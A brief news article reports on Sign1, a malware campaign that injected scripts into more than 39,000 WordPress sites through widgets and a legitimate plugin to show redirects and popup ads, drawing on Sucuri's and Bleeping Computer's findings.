It seems that there is a malware campaign that infected 39,000 WordPress sites. Check out more details about this very concerning matter below.
A new malware campaign, called Sign1, has been discovered to infect more than 39,000 websites in the past six months.
This campaign causes users to see unwanted redirects and popup ads when visiting an infected website.
The attackers behind this campaign inject the malware into custom HTML widgets and legitimate plugins on WordPress sites.
They do this by injecting malicious Sign1 scripts into these plugins rather than modifying the actual WordPress files.
Website security firm Sucuri identified the campaign after its client’s website displayed popup ads to visitors.
Although Sucuri’s client was breached due to a brute force attack, there is no information available on how other detected sites were compromised.
However, according to previous WordPress attacks, it is likely that attackers used a combination of brute force attacks and plugin vulnerabilities exploitation to gain access to the site.
After gaining access, threat actors tend to use WordPress custom HTML widgets or install Simple Custom CSS and JS plugin, which is a legitimate tool, to inject malicious JavaScript code.
Sucuri’s analysis of Sign1 malware revealed that it employs time-based randomization to generate dynamic URLs that change every 10 minutes.
This method helps the malware evade blocks. The domains used in the attacks are registered shortly before they’re used to ensure that they’re not in any blocklists.
According to Bleeping Computer, these URLs are used to fetch further malicious scripts that are run in a visitor’s browser.
“Initially, the domains were hosted on Namecheap, but the attackers have now moved to HETZNER for hosting and Cloudflare for IP address obfuscation,” the publication notes.
The same online publication also revealed the following: “The malicious code checks for specific referrers and cookies before executing, targeting visitors from major sites like Google, Facebook, Yahoo, and Instagram and remaining dormant in other cases.”
Supergiant Games has released the first major patch for Hades II Early Access, bringing a…
Exciting news for gaming and LEGO enthusiasts alike: LEGO Horizon Adventures is set to merge…
Canadians are facing massive wildfires in their country, and affected regions are even complying with…
Chapter 5 of Season 3 in Fortnite is approaching fast, and luckily enough for the…
MultiVersus, the game developed by the guys from Player First Games and launched back in…
OpenAI's controversial AI chatbot known as ChatGPT keeps going through some interesting changes. It seems…
This website uses cookies.